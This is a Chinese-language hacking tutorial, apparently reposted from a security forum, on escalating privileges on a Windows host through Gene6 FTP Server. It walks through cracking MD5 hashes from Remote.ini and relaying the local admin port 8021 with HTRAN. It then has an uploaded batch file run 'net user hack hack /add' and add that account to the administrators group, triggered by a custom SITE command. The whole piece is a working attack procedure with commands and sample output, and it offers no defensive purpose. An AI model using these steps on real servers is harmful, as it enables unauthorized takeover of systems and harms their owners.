Gene6 FTP Server提权方法

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
by:晓华
Gene6 FTP Server这个FTP软件简单易用,比SU的安全性高的多.
他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.
这一点和我们的SU一样,SU的管理端口是43958.
Gene6 FTP Server的帐户配置文件在:C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini;
如果不在请自己手动查找.具体的不再废话.
[Server]
IP=127.0.0.1,8021\r\n 这个是本地管理IP 和默认管理的端口,端口是可以修改的.
GrantAllAccessToLocalHost=0
[Acct=Administrator] 管理帐户
Enabled=1
Rights=0
Password=202CB962AC59075B964B07152D234B70 管理帐户的密码的MD5的加密字符串
[Acct=124] 这个是普通帐号,注意Acct=124这个帐号不是124,而是24;124中的1代表第一个帐号.
Enabled=1
Password=C8FFE9A587B126F152ED3D89A146B445 MD5的加密字符串,可以去破解出密码的明文.
Domain=
RootFolder=
Rights=0
IPAccessList=
我们得到管理密码后如何才能登陆上去管理呢? 我们可以用HTRAN的端口转发功能,把默认管理端口转发到其他端口,
然后进行连接.我们本地事先也安装一个Gene6 FTP Server软件.然后配置.
新建一个远程FTP管理






HOST那里输入你要提权的IP
PORT输入你用端口转发工具转发的端口,
USERNAME和PASSWORD输入Gene6 FTP Server的帐户配置文件所破解的帐号和密码信息,注意密码是MD5加密过的.必须输入明文的.
不出意外我们就可以连接上去了.我们可以新建一个普通的帐号.
我这里建一个名为msnhack密码为manhack的帐号然后选择好管理目录,然后我们在权限配置那里配置好权限.可以全部选上..



这样还不能提权.这里到了我们最核心的一步.
1.写一个能执行命令的批处理文件,并上传到目标主机.
@echo off
net user hack hack /add
net localgroup administrators hack /add
2.然后在SITE COMMANDS那个地方再进行配置.



COMMAND那输入你的命令执行的名字.我写的是HACK DESCRIPTTION这个是写描述的.这里随便你写什么都可以的.
EXECUTE这里输入你的BAT的命令执行文件的路径.也就是你刚上传的那个文件的路径.点OK就可以了.现在我们来看下我们本地的帐号情况.



只有两个帐号.现在我们登陆FTP进行提权操作.输入提权命令 "quote site hack"



200 Command executed 命令成功执行.
我们来看下加上帐号没有.



已经多了一个HACK的帐号,权限为管理权限.提升权限已经成功.

文章来自: 本站原创
Tags:
评论: 0 | 查看次数: 8584